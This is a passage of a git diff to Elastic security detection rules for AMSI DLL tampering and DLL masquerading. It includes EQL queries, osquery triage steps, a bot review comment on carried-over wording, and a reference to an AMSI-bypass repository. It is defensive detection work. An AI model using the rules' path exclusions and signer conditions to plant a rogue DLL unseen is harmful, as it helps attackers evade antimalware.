keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All 
Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribuition\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json index 3b0ee407295..c901b8c853f 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_5.json 
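Review bot: The investigation step `Investigate the execution of scripts and macros after the registry modification.` in the added `note` string does not fit this rule, whose `query` is a `file where` EQL search for `amsi.dll` being written outside its expected paths rather than a registry rule, so the guide reads as carried over from a registry-based rule. Suggest `- Investigate the execution of scripts and macros after the DLL was created.\n`, and in the same string `launched from the directory that the DLL was created` would read better as `launched from the directory in which the DLL was created`. The identical wording appears in the `note` hunks of fa488440-04cc-41d7-9279-539387bf2a17_5.json and fa488440-04cc-41d7-9279-539387bf2a17_6.json below. Since these files are versioned rule snapshots, the correction presumably belongs in the next rule version rather than in these files.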
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. 
AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All 
Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json index e52dfb82791..0bea1d776ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_6.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. 
AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All 
Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n",
 "references": [
 "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell"
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json
index b4318937871..7c90110ee55 100644
--- a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json
index 09ea9f0c10f..47e44280c82 100644 
--- a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json
index 8ef10308409..7b40b1ea815 100644
--- a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json
index af7d8b2dd85..c08a7abd94a 100644
--- a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json
index 166ccbd32c8..8fb2a7509fa 100644
--- a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json 
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Masquerading as System32 DLL",
- "query": "library where event.action == \"load\" and dll.Ext.relative_file_creation_time \u003c= 3600 and\n not (\n dll.path : (\n \"?:\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*\",\n \"?:\\\\Windows\\\\SystemTemp\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\",\n \"?:\\\\Windows\\\\assembly\\\\NativeImages_v*\"\n )\n ) and\n not (\n dll.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Hardware Abstraction Layer Publisher\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows 3rd party Component\",\n \"Microsoft 3rd Party Application Component\"\n ) and dll.code_signature.trusted == true\n ) and not dll.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n dll.name : (\n \"aadauthhelper.dll\", \"aadcloudap.dll\", \"aadjcsp.dll\", \"aadtb.dll\", \"aadwamextension.dll\", \"aarsvc.dll\", \"abovelockapphost.dll\", \"accessibilitycpl.dll\", \"accountaccessor.dll\", \"accountsrt.dll\", \"acgenral.dll\", \"aclayers.dll\", \"acledit.dll\", \"aclui.dll\", \"acmigration.dll\", \"acppage.dll\", \"acproxy.dll\", \"acspecfc.dll\", \"actioncenter.dll\", \"actioncentercpl.dll\", \"actionqueue.dll\", \"activationclient.dll\", \"activeds.dll\", \"activesynccsp.dll\", \"actxprxy.dll\", \"acwinrt.dll\", \"acxtrnal.dll\", \"adaptivecards.dll\", \"addressparser.dll\", \"adhapi.dll\", \"adhsvc.dll\", \"admtmpl.dll\", \"adprovider.dll\", \"adrclient.dll\", \"adsldp.dll\", \"adsldpc.dll\", \"adsmsext.dll\", \"adsnt.dll\", \"adtschema.dll\", \"advancedemojids.dll\", 
\"advapi32.dll\", \"advapi32res.dll\", \"advpack.dll\", \"aeevts.dll\", \"aeinv.dll\", \"aepic.dll\", \"ajrouter.dll\", \"altspace.dll\", \"amsi.dll\", \"amsiproxy.dll\", \"amstream.dll\", \"apds.dll\", \"aphostclient.dll\", \"aphostres.dll\", \"aphostservice.dll\", \"apisampling.dll\", \"apisetschema.dll\", \"apmon.dll\", \"apmonui.dll\", \"appcontracts.dll\", \"appextension.dll\", \"apphelp.dll\", \"apphlpdm.dll\", \"appidapi.dll\", \"appidsvc.dll\", \"appinfo.dll\", \"appinfoext.dll\", \"applicationframe.dll\", \"applockercsp.dll\", \"appmgmts.dll\", \"appmgr.dll\", \"appmon.dll\", \"appointmentapis.dll\", \"appraiser.dll\", \"appreadiness.dll\", \"apprepapi.dll\", \"appresolver.dll\", \"appsruprov.dll\", \"appvcatalog.dll\", \"appvclientps.dll\", \"appvetwclientres.dll\", \"appvintegration.dll\", \"appvmanifest.dll\", \"appvpolicy.dll\", \"appvpublishing.dll\", \"appvreporting.dll\", \"appvscripting.dll\", \"appvsentinel.dll\", \"appvstreamingux.dll\", \"appvstreammap.dll\", \"appvterminator.dll\", \"appxalluserstore.dll\", \"appxpackaging.dll\", \"appxsip.dll\", \"appxsysprep.dll\", \"archiveint.dll\", \"asferror.dll\", \"aspnet_counters.dll\", \"asycfilt.dll\", \"atl.dll\", \"atlthunk.dll\", \"atmlib.dll\", \"audioeng.dll\", \"audiohandlers.dll\", \"audiokse.dll\", \"audioses.dll\", \"audiosrv.dll\", \"auditcse.dll\", \"auditpolcore.dll\", \"auditpolmsg.dll\", \"authbroker.dll\", \"authbrokerui.dll\", \"authentication.dll\", \"authext.dll\", \"authfwcfg.dll\", \"authfwgp.dll\", \"authfwsnapin.dll\", \"authfwwizfwk.dll\", \"authhostproxy.dll\", \"authui.dll\", \"authz.dll\", \"autopilot.dll\", \"autopilotdiag.dll\", \"autoplay.dll\", \"autotimesvc.dll\", \"avicap32.dll\", \"avifil32.dll\", \"avrt.dll\", \"axinstsv.dll\", \"azroles.dll\", \"azroleui.dll\", \"azsqlext.dll\", \"basecsp.dll\", \"basesrv.dll\", \"batmeter.dll\", \"bcastdvrbroker.dll\", \"bcastdvrclient.dll\", \"bcastdvrcommon.dll\", \"bcd.dll\", \"bcdprov.dll\", \"bcdsrv.dll\", \"bcp47langs.dll\", 
\"bcp47mrm.dll\", \"bcrypt.dll\", \"bcryptprimitives.dll\", \"bdehdcfglib.dll\", \"bderepair.dll\", \"bdesvc.dll\", \"bdesysprep.dll\", \"bdeui.dll\", \"bfe.dll\", \"bi.dll\", \"bidispl.dll\", \"bindfltapi.dll\", \"bingasds.dll\", \"bingfilterds.dll\", \"bingmaps.dll\", \"biocredprov.dll\", \"bisrv.dll\", \"bitlockercsp.dll\", \"bitsigd.dll\", \"bitsperf.dll\", \"bitsproxy.dll\", \"biwinrt.dll\", \"blbevents.dll\", \"blbres.dll\", \"blb_ps.dll\", \"bluetoothapis.dll\", \"bnmanager.dll\", \"bootmenuux.dll\", \"bootstr.dll\", \"bootux.dll\", \"bootvid.dll\", \"bridgeres.dll\", \"brokerlib.dll\", \"browcli.dll\", \"browserbroker.dll\", \"browseui.dll\", \"btagservice.dll\", \"bthavctpsvc.dll\", \"bthavrcp.dll\", \"bthavrcpappsvc.dll\", \"bthci.dll\", \"bthpanapi.dll\", \"bthradiomedia.dll\", \"bthserv.dll\", \"bthtelemetry.dll\", \"btpanui.dll\", \"bwcontexthandler.dll\", \"cabapi.dll\", \"cabinet.dll\", \"cabview.dll\", \"callbuttons.dll\", \"cameracaptureui.dll\", \"capauthz.dll\", \"capiprovider.dll\", \"capisp.dll\", \"captureservice.dll\", \"castingshellext.dll\", \"castlaunch.dll\", \"catsrv.dll\", \"catsrvps.dll\", \"catsrvut.dll\", \"cbdhsvc.dll\", \"cca.dll\", \"cdd.dll\", \"cdosys.dll\", \"cdp.dll\", \"cdprt.dll\", \"cdpsvc.dll\", \"cdpusersvc.dll\", \"cemapi.dll\", \"certca.dll\", \"certcli.dll\", \"certcredprovider.dll\", \"certenc.dll\", \"certenroll.dll\", \"certenrollui.dll\", \"certmgr.dll\", \"certpkicmdlet.dll\", \"certpoleng.dll\", \"certprop.dll\", \"cewmdm.dll\", \"cfgbkend.dll\", \"cfgmgr32.dll\", \"cfgspcellular.dll\", \"cfgsppolicy.dll\", \"cflapi.dll\", \"cfmifs.dll\", \"cfmifsproxy.dll\", \"chakra.dll\", \"chakradiag.dll\", \"chakrathunk.dll\", \"chartv.dll\", \"chatapis.dll\", \"chkwudrv.dll\", \"chsstrokeds.dll\", \"chtbopomofods.dll\", \"chtcangjieds.dll\", \"chthkstrokeds.dll\", \"chtquickds.dll\", \"chxapds.dll\", \"chxdecoder.dll\", \"chxhapds.dll\", \"chxinputrouter.dll\", \"chxranker.dll\", \"ci.dll\", \"cic.dll\", \"cimfs.dll\", 
